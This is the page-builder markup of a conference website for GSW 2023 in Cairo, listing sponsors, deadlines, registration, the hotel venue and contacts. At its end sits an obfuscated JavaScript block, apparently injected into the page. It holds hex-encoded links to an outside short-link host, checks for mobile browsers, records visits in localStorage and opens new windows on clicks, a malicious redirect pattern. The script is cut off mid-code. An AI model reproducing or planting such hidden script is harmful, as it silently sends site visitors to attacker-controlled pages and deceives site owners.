src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"300\" height=\"124\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1682772322645{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023,at the InterContinental Cairo Semiramis,Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\"][vc_column][ultimate_heading main_heading=\"BOOK YOU HOTEL NOW\" main_heading_color=\"#8224e3\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #000080;\"><strong><a style=\"color: #000080;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h4>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684297351791{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 